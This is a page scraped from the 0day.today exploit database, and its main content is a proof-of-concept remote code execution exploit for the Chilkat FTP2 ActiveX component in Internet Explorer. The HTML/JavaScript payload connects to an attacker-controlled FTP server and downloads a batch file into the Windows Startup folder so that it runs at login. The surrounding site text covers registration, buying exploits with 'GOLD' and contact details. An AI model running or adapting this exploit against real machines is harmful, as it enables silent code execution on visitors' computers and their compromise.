0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Chilkat Software FTP2 ActiveX Component Remote Code Execution

Author

rgod

Risk

[

Security Risk Unsored

]

0day-ID

Category

Date add

Platform

=============================================================
Chilkat Software FTP2 ActiveX Component Remote Code Execution
=============================================================

<!--
Chilkat Software FTP2 ActiveX Component (ChilkatFtp2.DLL 2.6.1.1) Remote Code Execution poc
by rgod
tested against Internet Explorer 7 on Vista
should also work with 8/9
ActiveX Settings:
CLSID: {302124C4-30A0-484A-9C7A-B51D5BA5306B}
Progid: ChilkatFtp2.ChilkatFtp2.1
Binary Path: C:\Windows\System32\CHILKA~2.DLL
KillBitted: False
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): True
Safe For Scripting (IObjectSafety): True
 
This class allows to copy/overwrite files inside arbitrary locations ex. by the GetFile()
method. This code creates a batch file inside the automatic startup folder,
setup a ftp server allowing anonymous connections and place the code you want
to be retrieved.
This control is also used by lots of freeware applications, it was not documented so I posted here.
Note that previous versions has a different clsid, I'm saying this for filtering purposes.
-->
<html>
<object classid='clsid:302124C4-30A0-484A-9C7A-B51D5BA5306B' id='obj' />
</object>
<script>
obj.UnlockComponent("suntzu"); //needed for file transfer operations, type whatever here
obj.Port=21; //configure ftp connection
obj.Hostname="192.168.0.1"; //change here
obj.ConnectTimeout=5;
obj.Passive=1;
var x;
x=obj.Connect();
if (x==1){
x = obj.GetFile("suntzu.txt","c:/Users/All Users/Microsoft/Windows/Start Menu/Programs/Startup/suntzu.bat"); //boom
}
obj.Disconnect();
</script>
 


#  0day.today [2024-11-16]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Chilkat Software FTP2 ActiveX Component Remote Code Execution

Report Error

Report Error